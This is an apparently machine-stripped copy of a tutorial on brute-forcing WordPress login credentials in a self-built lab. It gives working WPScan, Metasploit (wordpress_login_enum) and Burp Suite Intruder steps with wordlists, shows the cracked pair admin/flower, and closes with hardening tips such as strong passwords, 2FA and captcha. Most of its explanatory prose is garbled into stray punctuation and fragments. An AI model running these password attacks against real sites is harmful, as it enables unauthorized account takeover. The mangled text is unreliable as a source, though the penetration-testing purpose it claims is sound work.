In this article, you will learn how to hack WordPress site credentials using various brute force attacks.
Content:
- Prerequisites
- WPscan
- Metasploit
- Burp Suite
- How to secure a site from brute force?
Prerequisites
- Website powered by WordPress. Here we will use our own laboratory for penetration testing , the creation of which was dedicated to our previous post.
- Kali Linux (WPscan). WPScan , Kali Linux .
- Burp Suite (Intruder). .
WPscan
WPscan โ , ยซ ยป. WPscan Linux, , .
WordPress, .
:
rockyou.txt, Kali Linux 14 341 564 .
wpscan --url http://192.168.1.100/wordpress/ -U users.txt -P /usr/share/wordlists/rockyou.txt- โURL โ URL-, URL- - WordPress .
- -U , users.txt
- -P rockyou.txt
. , .
admin flower.
Metasploit
Metasploit Kali Linux. Metasploit, WordPress. msf . , .
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.100
msf auxiliary(wordpress_login_enum) > set targeturi /wordpress
msf auxiliary(wordpress_login_enum) > set user_file user.txt
msf auxiliary(wordpress_login_enum) > set pass_file pass.txt
msf auxiliary(wordpress_login_enum) > exploit, :
- : admin
- : flower
Burp Suite
Kali Burp Suite Community Edition. Burp Suite WordPress. Burp Proxy. WordPress. .
, raj: raj, . Intruder, ctrl + I Send to Intrude .
Intruder , . Positions, , ยง. , ยง, . , .
, , add . . .
2 , cluster bomb. . , . , . , 1000 1000 , 1 000 000 .
start attack.
payloads 1 2. 1 . add , .
2 Runtime file, . -, . start attack.
, , admin flower 302 1203, . , : admin flower โ , .
?
, , :
8-16 . .
:
- (A)
- (a)
100%, .
.
, IP- - , .
โ 2FA. .
Captcha
WordPress , , . .
WordPress
. , , .
DN
CDN (Content Delivery Network) โ , . , CDN .
- Cloudflare
- Jetpack
- Swarmify
- Amazon CloudFront (1 )
- Incapsula
- JS Deliver
. . WordPress, .
WordPress.